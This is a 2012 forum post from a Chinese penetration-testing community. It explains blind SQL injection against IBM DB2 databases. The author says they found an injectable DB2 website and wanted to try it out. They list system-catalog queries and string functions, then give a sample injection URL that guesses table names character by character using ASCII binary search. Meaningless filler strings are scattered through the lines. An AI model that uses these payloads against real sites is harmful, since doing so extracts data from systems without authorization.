中国网络渗透测试联盟

标题: Sql Injection in DB2数据库 [打印本页]
作者: admin    时间: 2012-9-15 14:06
标题: Sql Injection in DB2数据库
使用DB2的人比较少了,今天碰到了一个可供注入的DB2网站,想试试身手。不过在网上很难找到相关的资料,只好自己研究了。 . F6 w, g4 _0 E) [+ \
参考了IBM DB2的文档,总结了这样几条:
' ~0 m- y( g$ ?, y/ h1、select NAME from SYSIBM.SYSTABLES where CREATOR =USER
+ W9 ?2 E- c9 h8 u6 s可以返回系统中所有用户创建的表(table)名 3 u. H4 L6 x  F+ p2 f* a5 K4 p& d, Q1 p
2、select NAME from SYSIBM.SYSCOLUMNS where TBCREATOR = '' and TBNAME='' ) C" y; q# N7 U/ D" j, C/ y
返回表中的列名
+ \0 F) y3 g0 ]9 [# B- z) [8 z3、select NAME from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY
. ^4 I0 [: V0 A# G* U* Y7 y这是最关键的地方,返回第一条记录,类似于sql server中的top 1 1 y0 R0 \: h4 ]6 p: _
4、SUBSTR(string, position, length) 7 L: y$ @3 p* s  ]  b$ f; ?' {7 Y
返回字符串子串的函数,类似于mid
0 s+ q! M( q4 {) w5、ASCII()这个就不用多说了。 ( n+ d1 `8 b% ^9 \
有了这些语句和函数,我们就可以很方便的用ascii拆半法猜出所有的table名,字段名,以及其中的数据了。
3 r* H. q, }5 ~例如判断第一个table的名称的第一个字符的ascii码是否大于50: 7 J0 O' r# h6 c. A. H
http://*.com?test.jsp?id=1 and (select ASCII(SUBSTR(NAME,1,1)) from SYSIBM.SYSTABLES where CREATOR =USER FETCH FIRST 1 ROWS ONLY)>50 --
! }# R! D' W2 G( n" K0 O2 T  D0 H4 R/ O$ U; g4 e: B
http://blog.waynedeng.com/blogview.asp?logID=543
8 a' M# I. G* A" K# F



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2